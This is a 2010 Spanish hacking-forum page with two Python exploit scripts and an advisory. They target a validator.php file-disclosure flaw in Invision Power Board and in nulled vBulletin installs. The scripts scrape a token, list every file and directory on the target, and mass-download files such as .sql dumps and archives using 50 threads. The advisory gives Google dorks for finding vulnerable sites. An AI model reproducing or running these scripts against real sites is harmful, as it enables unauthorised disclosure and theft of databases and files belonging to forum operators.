|
Mostrar Mensajes
|
Páginas: 1 [2]
|
12
|
Seguridad Informática / Nivel Web / InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
|
en: 24 Enero 2010, 23:02 pm
|
#! /usr/bin/env python3.1
################################################################ # _____ _____ ____ (validator.php) # # |_ _| __ \| _ \ # # | | | |__) | |_) | # # | | | ___/| _ < # # _| |_| | | |_) | # # |_____|_| |____/ # # @expl0it... # ################################################################ # [ IPB Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################
import os, sys, urllib.request, urllib.parse, threading
def main(): logo = """ \t |---------------------------------------------------------------| \t | _____ _____ ____ (TM) | \t | |_ _| __ \| _ \ | \t | | | | |__) | |_) | | \t | | | | ___/| _ < | \t | _| |_| | | |_) | | \t | |_____|_| |____/ | \t | | \t | | \t | IPB Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: ipbfd.py scan http://www.site.com/IPB_folder | | ipbfd.py download *.zip -> all | | ipbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(args) == 3: try: print("Please wait...") if args[1] == "scan": extract_parse_save(args[2].strip("/")) elif args[1] == "download": download_data(args[2]) except Exception as message: print("An error occurred: {}".format(message)) except: print("Unknown error.") else: print("Ready!") else: print(usage) input()
def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with urllib.request.urlopen(hurl) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" index = source.find(word) if index != -1: source = source[index + len(word):] value = source[:source.index("'")] hurl = url + "/validator.php?op={}".format(value) else: print("[!]Token not found.") print("[+]Obtaining paths...") with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find("<td>") if index != -1: lastk = line[index + 4:line.index("</td>")].strip(" ").strip(" ") index = line.find("<strong>") if index != -1: lastv = line[index + 8:line.index("</strong>")].strip(" ") if lastk != None and lastv != None: index = lastk.rfind(".") if index in (-1, 0): lastk = "[other] {}".format(lastk) else: lastk = "[{}] {}".format(lastk[index + 1:], lastk) dictionary[lastk] = lastv lastk, lastv = None, None print("[+]Organizing and saving paths...") with open("IPBlogs.txt", "w") as fout: fout.write(url + "\n") keys = sorted(dictionary.keys()) for key in keys: fout.write("{} ({})\n".format(key, dictionary[key]))
def download_data(files): print("[+]Searching and downloading files...") mthreads = 50 with open("vBlogs.txt", "r") as fin: url = fin.readline().strip("\n").strip("/") if files.find("*") == -1: hurl = url + "/" + files.strip("/") Download(hurl).start() else: ext = files[files.rindex(".") + 1:] for line in fin: pieces = line.strip("\n").split(" ") if pieces[0].count(ext) == 1: upath = pieces[1] hurl = url + "/" + upath.strip("/") while threading.active_count() > mthreads: pass Download(hurl).start() while threading.active_count() > 1: pass
class Download(threading.Thread):
def __init__(self, url): threading.Thread.__init__(self) self.url = url
def run(self): try: with urllib.request.urlopen(self.url) as usock: data = usock.read() uparser = urllib.parse.urlparse(usock.geturl()) pieces = uparser.path.split("/") fname = pieces[len(pieces) - 1] with open(fname, "wb") as fout: fout.write(data) except: pass
if __name__ == "__main__": main() You must have python 3.1 to work!
|
|
|
13
|
Seguridad Informática / Nivel Web / Re: vBulletin nulled (validator.php) files/directories disclosure
|
en: 24 Enero 2010, 02:01 am
|
#! /usr/bin/env python3.1 # ################################################################ # ____ _ _ _ _ (validator.php) # # | _ \ | | | | | (_) # # __ _| |_) |_ _| | | ___| |_ _ _ __ # # \ \ / / _ <| | | | | |/ _ \ __| | '_ \ # # \ V /| |_) | |_| | | | __/ |_| | | | | # # \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| # # @expl0it... # ################################################################ # [ vBulletin Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | ____ _ _ _ _ (TM) | \t | | _ \ | | | | | (_) | \t | __ _| |_) |_ _| | | ___| |_ _ _ __ | \t | \ \ / / _ <| | | | | |/ _ \ __| | '_ \ | \t | \ V /| |_) | |_| | | | __/ |_| | | | | | \t | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| | \t | | \t | vBulletin Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | Dork: intext:"Powered by vBulletin" | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: vbfd.py scan http://www.site.com/vB_folder | | vbfd.py download *.sql -> all | | vbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(args) == 3: try: print("Please wait...") if args[1] == "scan": extract_parse_save(args[2].strip("/")) elif args[1] == "download": download_data(args[2]) except Exception as message: print("An error occurred: {}".format(message)) except: print("Unknown error.") else: print("Ready!") else: print(usage) input() def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with urllib.request.urlopen(hurl) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" source = source[source.index(word) + len(word):] value = source[:source.index("'")] print("[+]Obtaining paths...") hurl = url + "/validator.php?op={}".format(value) with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find("<td>") if index != -1: lastk = line[index + 4:line.index("</td>")].strip(" ") index = line.find("<strong>") if index != -1: lastv = line[index + 8:line.index("</strong>")].strip(" ") if lastk != None and lastv != None: index = lastk.rfind(".") if index in (-1, 0): lastk = "[other] {}".format(lastk) else: lastk = "[{}] {}".format(lastk[index + 1:], lastk) dictionary[lastk] = lastv lastk, lastv = None, None print("[+]Organizing and saving paths...") with open("vBlogs.txt", "w") as fout: fout.write(url + "\n") keys = sorted(dictionary.keys()) for key in keys: fout.write("{} ({})\n".format(key, dictionary[key])) def download_data(files): print("[+]Searching and downloading files...") mthreads = 50 with open("vBlogs.txt", "r") as fin: url = fin.readline().strip("\n") if files.find("*") == -1: hurl = url + "/" + files.strip("/") Download(hurl).start() else: ext = files[files.rindex(".") + 1:] for line in fin: pieces = line.strip("\n").split(" ") if pieces[0].count(ext) == 1: upath = pieces[1] hurl = url + "/" + upath.strip("/") while threading.active_count() > mthreads: pass Download(hurl).start() while threading.active_count() > 1: pass class Download(threading.Thread): def __init__(self, url): threading.Thread.__init__(self) self.url = url def run(self): try: with urllib.request.urlopen(self.url) as usock: data = usock.read() uparser = urllib.parse.urlparse(usock.geturl()) pieces = uparser.path.split("/") fname = pieces[len(pieces) - 1] with open(fname, "wb") as fout: fout.write(data) except: pass if __name__ == "__main__": main()
|
|
|
19
|
Seguridad Informática / Nivel Web / vBulletin nulled (validator.php) files/directories disclosure
|
en: 20 Enero 2010, 20:24 pm
|
*\-----------------------------------------------------------------------------/* ____ _ _ _ _ (nulled) | _ \ | | | | | (_) __ _| |_) |_ _| | | ___| |_ _ _ __ \ \ / / _ <| | | | | |/ _ \ __| | '_ \ \ V /| |_) | |_| | | | __/ |_| | | | | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| Full disclosure... *\-----------------------------------------------------------------------------/* Name: vBulletin nulled (validator.php) files/directories disclosure Author: TinKode Date: 19-01-2010 Dork: "inurl:validator.php" *\-----------------------------------------------------------------------------/* Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything) / directories from the folder with vBulletin i nstalled... *\-----------------------------------------------------------------------------/* Exploit: http://www.website.com/vB_forum/validator.php *\-----------------------------------------------------------------------------/* Note: Work on many nulled versions (maybe all) *\-----------------------------------------------------------------------------/* Copyrights: http://tinkode.baywords.com *\-----------------------------------------------------------------------------/* Greetz: http://www.insecurity.ro, http://www.darkc0de.com *\-----------------------------------------------------------------------------/*
|
|
|
|
|
|
|